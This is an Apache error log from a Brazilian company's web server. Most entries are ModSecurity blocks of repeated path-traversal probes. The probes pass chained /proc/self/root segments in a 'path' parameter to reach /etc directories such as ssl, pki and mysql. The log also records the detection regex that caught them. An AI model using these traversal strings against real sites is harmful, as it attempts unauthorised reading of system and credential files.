https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:22:25.043244 2026] [:error] [pid 7437:tid 140411616036608] [client 74.7.241.31:52520] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmb4QeiSKl8TjouI-YhBQAAA88"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:22:27.555700 2026] [:error] [pid 17965:tid 140411725141760] [client 74.7.241.31:47708] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmb46t8Nd0UC_OcbVHSQAAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:22:31.743846 2026] [:error] [pid 17965:tid 140411599251200] [client 74.7.241.31:47720] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmb56t8Nd0UC_OcbVHSRQAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:22:34.992481 2026] [:error] [pid 17965:tid 140411540502272] [client 74.7.241.31:47728] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmb6qt8Nd0UC_OcbVHSRwAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:22:37.166447 2026] [:error] [pid 7437:tid 140411632822016] [client 74.7.241.31:47730] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmb7QeiSKl8TjouI-YhBwAAA80"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:22:44.105934 2026] [proxy_fcgi:error] [pid 17965:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:60304] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:22:47.087749 2026] [:error] [pid 19507:tid 140411607643904] [client 74.7.243.128:35594] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmb9NY0UrI5A3LftIwFAwAAAZA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:22:47.088492 2026] [:error] [pid 18380:tid 140411624429312] [client 74.7.241.31:42992] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmb9a4xEDsg_V3ESNZUIwAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:22:51.436489 2026] [:error] [pid 7437:tid 140411624429312] [client 74.7.241.31:54098] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmb-weiSKl8TjouI-YhDAAAA84"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:22:55.818698 2026] [:error] [pid 9299:tid 140411741927168] [client 74.7.241.31:54102] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmb_7-sgTmmJoPuMdy-fwAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:22:58.331198 2026] [:error] [pid 18380:tid 140411548894976] [client 74.7.241.31:37944] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcAq4xEDsg_V3ESNZUJQAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:23:00.520795 2026] [:error] [pid 9299:tid 140411548894976] [client 74.7.241.31:38162] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcBL-sgTmmJoPuMdy-gwAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:23:03.139822 2026] [:error] [pid 2473:tid 140411599251200] [client 74.7.241.31:38324] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcB6BJNF7axNlVR0UgegAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:23:05.347899 2026] [:error] [pid 7004:tid 140411658000128] [client 74.7.241.31:38452] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcCcU6Sx0TG1YjmQi3QwAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:23:06.141804 2026] [proxy_fcgi:error] [pid 2473:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:60678] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:23:06.787407 2026] [:error] [pid 17965:tid 140411599251200] [client 74.7.241.31:38596] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcCqt8Nd0UC_OcbVHSTwAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:23:07.211945 2026] [:error] [pid 29151:tid 140411582465792] [client 74.7.243.128:46478] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcC_PqhzTj3BvfDX-PsQAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:23:08.343604 2026] [:error] [pid 2473:tid 140411574073088] [client 74.7.241.31:54916] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcDKBJNF7axNlVR0UgfgAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:23:12.561430 2026] [:error] [pid 6296:tid 140411666392832] [client 74.7.241.31:54930] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcEHIk7brgkOH-rIWTnAAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:23:16.435834 2026] [:error] [pid 29151:tid 140411590858496] [client 74.7.241.31:54942] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcFPPqhzTj3BvfDX-PtQAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:23:18.243820 2026] [:error] [pid 9299:tid 140411691570944] [client 74.7.241.31:35658] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcFr-sgTmmJoPuMdy-hAAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:23:21.039868 2026] [:error] [pid 29151:tid 140411733534464] [client 74.7.241.31:35664] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcF_PqhzTj3BvfDX-PtgAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:23:22.374705 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.241.31:35670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcGtY0UrI5A3LftIwFDgAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
